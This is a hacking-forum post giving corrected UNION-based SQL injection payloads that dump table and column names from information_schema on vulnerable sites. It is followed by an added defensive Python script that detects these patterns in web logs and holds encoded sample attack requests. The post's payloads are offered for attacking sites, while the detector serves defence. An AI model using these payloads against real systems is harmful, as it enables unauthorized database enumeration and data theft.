Some Updated Queries For SQL Injection

alcohologist
SX Crew
Joined: 2010/11/22

I would just like to correct some queries for SQL injection so that people would not have problems inserting queries into an SQL-vulnerable site.

PROBLEM

union select 1,2,group_concat(table_name),4,5 from information_schema.tables--

or

union select all 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

And so here is the latest update in order to fix the problem:

Updated

union select 1,2,group_concat(table_name),4,5 +from+information_schema.tables+where+ table_schema=database()--

or

union select 1,2,group_concat(column_name),4,5 +from+information_schema.columns+where table_schema=database()--  

==================================
> table_schema is the database, so when you type table_schema=database() it returns true and dumps all user-created tables, which is also the same for columns.

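For whoever reviews the web logs of an affected site, the queries in the post above leave a recognisable trace in the request line. The following is an added example, not part of the original post: it decodes a request target (turning `+` and `%20` back into spaces) and flags the combination of `union select` with `information_schema.tables` or `information_schema.columns`. The function names, signal names and sample request paths are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signals taken from the queries in the post; the labels are this example's own.
SIGNALS = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("information_schema",
     re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b")),
    ("table_schema=database()",
     re.compile(r"\btable_schema\s*=\s*database\s*\(\s*\)")),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(")),
]

def normalize(query_string):
    """Reduce a raw query string to the text the SQL parser would see."""
    text = query_string
    for _ in range(2):                       # single and double URL encoding
        text = unquote_plus(text)            # '+' and %20 both become a space
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # block comments act as whitespace
    return re.sub(r"\s+", " ", text).lower()

def classify(request_target):
    """Return (verdict, matched signal names) for one logged request target."""
    text = normalize(urlsplit(request_target).query)
    hits = [name for name, rx in SIGNALS if rx.search(text)]
    # Schema enumeration needs both halves; one signal alone is only a lead.
    if "union-select" in hits and "information_schema" in hits:
        return "alert", hits
    return ("suspect" if hits else "clean"), hits

# Constructed request targets; /item.php and /search are hypothetical paths.
SAMPLES = [
    "/item.php?id=-1+union+select+1,2,group_concat(table_name),4,5"
    "+from+information_schema.tables+where+table_schema=database()--",
    "/item.php?id=-1%20UNION%20ALL%20SELECT%201,2,group_concat(column_name),4,5"
    "%20from%20information_schema.columns%20where%20table_schema=database()",
    "/search?q=student+union+select+committee",   # benign text, one signal only
    "/item.php?id=42",
]

if __name__ == "__main__":
    for target in SAMPLES:
        verdict, hits = classify(target)
        print(f"{verdict:8} {hits} {target}")
```

A hit only means the request was sent. Whether it returned data depends on the application, and the durable fix is a parameterized query in the code that builds the SQL.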